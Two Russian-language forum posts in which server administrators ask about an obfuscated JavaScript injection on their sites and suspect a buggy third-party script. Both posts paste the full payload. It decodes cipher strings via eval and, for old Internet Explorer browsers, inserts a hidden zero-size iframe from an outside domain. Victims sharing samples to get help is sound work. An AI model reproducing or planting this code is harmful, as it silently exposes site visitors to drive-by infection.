Кто нибудь встречался с такой заразой: Code: ### script#/**/function ZqPT(wzs1, VGc0, RWf3) { var UuY0; UuY0=wzs1.split(VGc0); var Bub0=UuY0.join(RWf3); return Bub0;/**/ } function Zvc0(unY0) { unY0 = ZqPT(unY0,"##+##","'"); unY0 = ZqPT(unY0,"##|##","\\"); Bub0=""; yxa6 =""; for(k=0;k<unY0.length;k++) { Bub0 = unY0.charCodeAt(k); if (Bub0==32){Bub0=35} else if (Bub0==35){Bub0=32} else if (Bub0==59){Bub0=64} else if (Bub0==64){Bub0=59} else if (Bub0==37){Bub0=42} else if (Bub0==42){Bub0=37} else if (Bub0>=97 && Bub0<=122) { Bub0=Bub0-97;Bub0=25-Bub0;Bub0+=97; }else if (Bub0>=65 && Bub0<=90) { Bub0=Bub0-65;Bub0=25-Bub0;Bub0+=65; }else if (Bub0>=48 && Bub0<=57) { Bub0=Bub0-48;Bub0=9-Bub0;Bub0+=48; } yxa6 += String.fromCharCode(Bub0); } return yxa6;/**/ }ZPd6=eval;var ZCi1;var osi4;var Eyik;var boMZ;var Mik1;var EnB4;var Csm4;ZPd6(Zvc0('VmY5#=###+##sggk://svczglny.xln/urovh/a/hgzgrx.ksk##+##@Nrp8#=###+##ruiznv##+##@'));ZPd6(Zvc0('AXr8#=#wlxfnvmg.xivzgvVovnvmg(Nrp8)@AXr8.hvgZggiryfgv(##+##hix##+##,#VmY5)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##drwgs##+##,9)@AXr8.hvgZggiryfgv(##+##svrtsg##+##,9)@AXr8.hvgZggiryfgv(##+##yliwvi##+##,9)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#Xhn5=mzertzgli.fhviZtvmg.glOldviXzhv()@'));ZPd6(Zvc0('Vbrp=Xhn5.rmwvcLu(##+##nhrv##+##)@lhr5=Xhn5.rmwvcLu(##+##nhrv#1##+##)@ylNA=Xhn5.rmwvcLu(##+##mg#3##+##)@'));if ((osi4==-1)&&(Eyik>0)&&(boMZ==-1)){ZPd6(Zvc0('wlxfnvmg.ylwb.zkkvmwXsrow(AXr8)@'));}/script> делает инъекцию кода, который от страницы к странице мутирует. Проблема вероятно не на стороне клиента делающего ftp конект ибо: -rw-rw-rw- 1 apache apache 64307 Sep 25 02:16 index.shtml - файло заражается от от имени апаче.
На серверах за которыми смотрю. Это и есть как понимаешь сама инъекция а не код который ее делает.. ######## script#/**/function ZqPT(wzs1, VGc0, RWf3) { var UuY0; UuY0=wzs1.split(VGc0); var Bub0=UuY0.join(RWf3); return Bub0;/**/ } function Zvc0(unY0) { unY0 = ZqPT(unY0,"##+##","'"); unY0 = ZqPT(unY0,"##|##","\\"); Bub0=""; yxa6 =""; for(k=0;k<unY0.length;k++) { Bub0 = unY0.charCodeAt(k); if (Bub0==32){Bub0=35} else if (Bub0==35){Bub0=32} else if (Bub0==59){Bub0=64} else if (Bub0==64){Bub0=59} else if (Bub0==37){Bub0=42} else if (Bub0==42){Bub0=37} else if (Bub0>=97 && Bub0<=122) { Bub0=Bub0-97;Bub0=25-Bub0;Bub0+=97; }else if (Bub0>=65 && Bub0<=90) { Bub0=Bub0-65;Bub0=25-Bub0;Bub0+=65; }else if (Bub0>=48 && Bub0<=57) { Bub0=Bub0-48;Bub0=9-Bub0;Bub0+=48; } yxa6 += String.fromCharCode(Bub0); } return yxa6;/**/ }ZPd6=eval;var ZCi1;var osi4;var Eyik;var boMZ;var Mik1;var EnB4;var Csm4;ZPd6(Zvc0('VmY5#=###+##sggk://svczglny.xln/urovh/a/hgzgrx.ksk##+##@Nrp8#=###+##ruiznv##+##@'));ZPd6(Z vc0('AXr8#=#wlxfnvmg.xivzgvVovnvmg(Nrp8)@AXr8.hvgZ ggiryfgv(##+##hix##+##,#VmY5)@'));ZPd6(Zvc0('AXr8. hvgZggiryfgv(##+##drwgs##+##,9)@AXr8.hvgZggiryfgv( ##+##svrtsg##+##,9)@AXr8.hvgZggiryfgv(##+##yliwvi# #+##,9)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbo v##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+# #)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbov##+# #,##+##wrhkozb:mlmv##+##)@#Xhn5=mzertzgli.fhviZtvm g.glOldviXzhv()@'));ZPd6(Zvc0('Vbrp=Xhn5.rmwvcLu(# #+##nhrv##+##)@lhr5=Xhn5.rmwvcLu(##+##nhrv#1##+##) @ylNA=Xhn5.rmwvcLu(##+##mg#3##+##)@'));if ((osi4==-1)&&(Eyik>0)&&(boMZ==-1)){ZPd6(Zvc0('wlxfnvmg.ylwb.zkkvmwXsrow(AXr8)@')) ;}script ######## Очень вероятно что первопричиной заражения является бажный tgpost script. Идеи есть?
